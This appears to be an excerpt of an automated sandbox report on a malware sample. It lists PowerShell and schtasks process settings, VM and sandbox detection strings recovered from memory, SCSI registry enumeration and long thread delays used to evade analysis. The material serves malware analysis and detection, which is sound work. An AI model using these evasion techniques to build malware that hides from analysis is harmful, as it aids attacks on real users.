Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\schtasks.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\schtasks.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\schtasks.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\schtasks.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Query firmware table information (likely to detect VMs)

Source: C:\Windows\explorer.exe

System information queried: FirmwareTableInformation

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4576083277.0000000002F70000.00000040.00001000.00020000.00000000.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4559431109.0000000000400000.00000040.00000001.01000000.00000009.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000003.2160724822.0000000003860000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: RTP.EXESYSTEMROOT=SETFILETIMESIGNWRITINGSOFT_DOTTEDSYSTEMDRIVETTL EXPIREDUNINSTALLERVBOXSERVICEVMUSRVC.EXEVARIANTINITVIRTUALFREEVIRTUALLOCKWSARECVFROMWARANG_CITIWHITE_SPACEWINDEFENDER[:^XDIGIT:]\DSEFIX.EXEADDITIONALSALARM CLOCKAPPLICATIONASSISTQUEUEAUTHORITIESBAD ADDRESSBAD ARGSIZEBAD M VALUEBAD MESSAGEBAD TIMEDIVBITCOINS.SKBROKEN PIPECAMPAIGN_IDCGOCALL NILCLOBBERFREECLOSESOCKETCOMBASE.DLLCREATED BY CRYPT32.DLLE2.KEFF.ORGEMBEDDED/%SEXTERNAL IPFILE EXISTSFINAL TOKENFLOAT32NAN2FLOAT64NAN1FLOAT64NAN2FLOAT64NAN3GCCHECKMARKGENERALIZEDGET CDN: %WGETPEERNAMEGETSOCKNAMEGLOBALALLOCHTTP2CLIENTHTTP2SERVERHTTPS_PROXYI/O TIMEOUTLOCAL ERRORMSPANMANUALMETHODARGS(MINTRIGGER=MOVE %S: %WMSWSOCK.DLLNETPOLLINITNEXT SERVERNIL CONTEXTOPERA-PROXYORANNIS.COMOUT OF SYNCPARSE ERRORPROCESS: %SREFLECT.SETREFLECTOFFSRETRY-AFTERRUNTIME: P RUNTIME: G RUNTIME: P SCHEDDETAILSECHOST.DLLSECUR32.DLLSERVICE: %SSHELL32.DLLSHORT WRITESTACK TRACESTART PROXYTASKMGR.EXETLS: ALERT(TRACEALLOC(TRAFFIC UPDUNREACHABLEUSERENV.DLLVERSION.DLLVERSION=195WININET.DLLWUP_PROCESS (SENSITIVE) B (
Source: file.exe, 00000000.00000000.2090227189.0000000001282000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: SBIEDLL.DLLL
Source: e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4576083277.0000000002F70000.00000040.00001000.00020000.00000000.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4559431109.0000000000400000.00000040.00000001.01000000.00000009.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000003.2160724822.0000000003860000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: TOO MANY LINKSTOO MANY USERSTORRC FILENAMEUNEXPECTED EOFUNKNOWN CODE: UNKNOWN ERROR UNKNOWN METHODUNKNOWN MODE: UNREACHABLE: UNSAFE.POINTERUSERARENASTATEVIRTUALBOX: %WVMWARETRAY.EXEVMWAREUSER.EXEWII LIBNUP/1.0WINAPI ERROR #WINDOW CREATEDWORK.FULL != 0XENSERVICE.EXEZERO PARAMETER WITH GC PROG
Source: e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4576083277.0000000002F70000.00000040.00001000.00020000.00000000.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4559431109.0000000000400000.00000040.00000001.01000000.00000009.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000003.2160724822.0000000003860000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: ... OMITTING ACCEPT-CHARSETAFTER EFIGUARDALLOCFREETRACEBAD ALLOCCOUNTBAD RECORD MACBAD RESTART PCBAD SPAN STATEBTC.USEBSV.COMCERT INSTALLEDCHECKSUM ERRORCONTENT-LENGTHCOULDN'T PATCHDATA TRUNCATEDDISTRIBUTOR_IDDRIVER REMOVEDERROR RESPONSEFILE TOO LARGEFINALIZER WAITGCSTOPTHEWORLDGET UPTIME: %WGETPROTOBYNAMEGOT SYSTEM PIDINITIAL SERVERINTERNAL ERRORINVALID SYNTAXIS A DIRECTORYKEY SIZE WRONGLEVEL 2 HALTEDLEVEL 3 HALTEDMEMPROFILERATEMULTIPARTFILESNEED MORE DATANIL ELEM TYPE!NO MODULE DATANO SUCH DEVICEOPEN EVENT: %WPARSE CERT: %WPROTOCOL ERRORREAD CERTS: %WREAD_FRAME_EOFREFLECT.VALUE.REMOVE APP: %WRUNTIME: FULL=RUNTIME: WANT=S.ALLOCCOUNT= SEMAROOT QUEUESERVER.VERSIONSTACK OVERFLOWSTART TASK: %WSTOPM SPINNINGSTORE64 FAILEDSYNC.COND.WAITTEXT FILE BUSYTIME.LOCATION(TIMEENDPERIODTOO MANY LINKSTOO MANY USERSTORRC FILENAMEUNEXPECTED EOFUNKNOWN CODE: UNKNOWN ERROR UNKNOWN METHODUNKNOWN MODE: UNREACHABLE: UNSAFE.POINTERUSERARENASTATEVIRTUALBOX: %WVMWARETRAY.EXEVMWAREUSER.EXEWII LIBNUP/1.0WINAPI ERROR #WINDOW CREATEDWORK.FULL != 0XENSERVICE.EXEZERO PARAMETER WITH GC PROG
Source: e0cbefcb1af40c7d4aff4aca26621a98.exe	Binary or memory string: RTP.EXESYSTEMROOT=SETFILETIMESIGNWRITINGSOFT_DOTTEDSYSTEMDRIVETTL EXPIREDUNINSTALLERVBOXSERVICEVMUSRVC.EXEVARIANTINITVIRTUALFREEVIRTUALLOCKWSARECVFROMWARANG_CITIWHITE_SPACEWINDEFENDER[:^XDIGIT:]\DSEFIX.EXEADDITIONALSALARM CLOCKAPPLICATIONASSISTQUEUEAUTHORITIES

Checks if the current machine is a virtual machine (disk enumeration)

Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cdttvvc	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Roaming\cdttvvc	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Roaming\cdttvvc	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Roaming\cdttvvc	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Roaming\cdttvvc	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Roaming\cdttvvc	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI

Source: C:\Users\user\Desktop\file.exe TID: 2224	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\latestX.exe TID: 5980	Thread sleep time: -31000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5672	Thread sleep count: 6067 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5704	Thread sleep count: 2204 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5368	Thread sleep time: -3689348814741908s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3940	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1492	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5560	Thread sleep time: -1844674407370954s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 5960	Thread sleep count: 479 > 30
Source: C:\Windows\explorer.exe TID: 1428	Thread sleep count: 1317 > 30
Source: C:\Windows\explorer.exe TID: 1428	Thread sleep time: -131700s >= -30000s
Source: C:\Windows\explorer.exe TID: 2832	Thread sleep count: 814 > 30
Source: C:\Windows\explorer.exe TID: 2832	Thread sleep time: -81400s >= -30000s
Source: C:\Windows\explorer.exe TID: 3496	Thread sleep count: 291 > 30
Source: C:\Windows\explorer.exe TID: 4144	Thread sleep count: 276 > 30
Source: C:\Windows\explorer.exe TID: 5908	Thread sleep count: 232 > 30
Source: C:\Windows\explorer.exe TID: 1428	Thread sleep count: 3039 > 30
Source: C:\Windows\explorer.exe TID: 1428	Thread sleep time: -303900s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1936	Thread sleep count: 4495 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2848	Thread sleep count: 1561 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6684	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5160	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1424	Thread sleep time: -7378697629483816s >= -30000s
Source: C:\Program Files\Google\Chrome\updater.exe TID: 6828	Thread sleep time: -31000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2688	Thread sleep count: 5325 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1432	Thread sleep count: 2634 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6208	Thread sleep time: -3689348814741908s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7028	Thread sleep count: 5975 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7140	Thread sleep count: 2153 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4208	Thread sleep time: -3689348814741908s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6640	Thread sleep count: 5121 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1136	Thread sleep count: 3108 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2012	Thread sleep time: -4611686018427385s >= -30000s
Source: C:\Windows\explorer.exe TID: 2052	Thread sleep count: 101 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5376	Thread sleep count: 5080 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5356	Thread sleep count: 2943 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2996	Thread sleep time: -2767011611056431s >= -30000s

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe

Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep

graph_3-9709

Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6067	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2204	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4069	Jump to behavior
